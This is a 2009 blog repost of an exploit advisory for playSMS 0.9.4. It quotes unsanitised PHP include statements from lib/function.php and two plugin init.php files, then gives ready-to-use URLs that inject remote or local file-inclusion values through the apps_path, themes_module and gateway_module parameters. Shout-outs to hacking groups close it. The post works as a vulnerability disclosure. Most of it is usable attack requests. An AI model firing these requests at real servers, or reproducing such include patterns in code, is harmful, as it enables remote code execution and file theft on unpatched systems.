Thursday, October 15, 2009

playSMS ver 0.9.4 RFI & LFI Vulnerability

6:54 PM  matthews  

[o]====================================[o]
[x] playSMS version 0.9.4 [x]
[x] RFI&LFI Vulnerability [x]

Download:http://playsms.sourceforge.net/ 167.9 KB
Date : 14 Oct 2009
[o]====================================[o]

file: /lib/function.php

// main functions
include "$apps_path[libs]/fn_logger.php"; line 4
include "$apps_path[libs]/fn_auth.php"; line 5
include "$apps_path[libs]/fn_user.php"; line 6
include "$apps_path[libs]/fn_sendsms.php"; line 7
include "$apps_path[libs]/fn_sendmail.php"; line 8
include "$apps_path[libs]/fn_phonebook.php"; line 9
include "$apps_path[libs]/fn_core.php"; line 10
include "$apps_path[libs]/fn_themes.php"; line 11

// init global variables
include "$apps_path[libs]/lib_init1.php"; line 14

// custom functions before plugins loading
include "$apps_path[libs]/fn_custom1.php"; line 17

// init global variables
include "$apps_path[libs]/lib_init2.php"; line 65

// custom functions before plugins loading
include "$apps_path[libs]/fn_custom2.php"; line 68

http://localhost/[path]/lib/function.php?apps_path[libs]=[tutung-RFI]

[o]====================================[o]

file: /plugin/themes/default/init.php

include $apps_path[themes]."/".$themes_module."/config.php";
include $apps_path[themes]."/".$themes_module."/fn.php"; line 3

http://localhost/[path]/plugin/themes/default/init.php?apps_path[themes]=[tutung-RFI]
http://localhost/[path]/plugin/themes/default/init.php?themes_module=[tutung-LFI]

[o]====================================[o]

file: /plugin/gateway/gnokii/init.php

include "$apps_path[plug]/gateway/$gateway_module/config.php"; line 2
include "$apps_path[plug]/gateway/$gateway_module/fn.php"; line 3

http://localhost/[path]/plugin/gateway/gnokii/init.php?apps_path[plug]=[tutung-RFI]
http://localhost/[path]/plugin/gateway/gnokii/init.php?gateway_module=[tutung-LFI]

[o]====================================[o]

i think bug was publish by
ahmadbady [kivi_hacker666@yahoo.com] at playSMS version 0.9.3
but vendor still don't have update the bug at playSMS version 0.9.4,
so it's not same version right? :D

colek-colek
: All Brotha Antisecurity[dot]Org www.MainHack.net www.ServerIsDown.org
Jack-, Vrs_hCk, OoN_Boy, NoGe, zxvf, Yadoy666, s3t4n, r3v4n_b4st4rd,
pizzyroot,
em|nem, s4va,
kecemplungkalen, xr00tb0y
xshadow, Tante Angela Chang, IrcMafia
Indonesian Coder
Don Tukulesto, M3NW5, m364tr0n, cyb3r_tr0n

./noname

[o]====================================[o]

Posted in:
Twitter Delicious Facebook Digg Stumbleupon Favorites More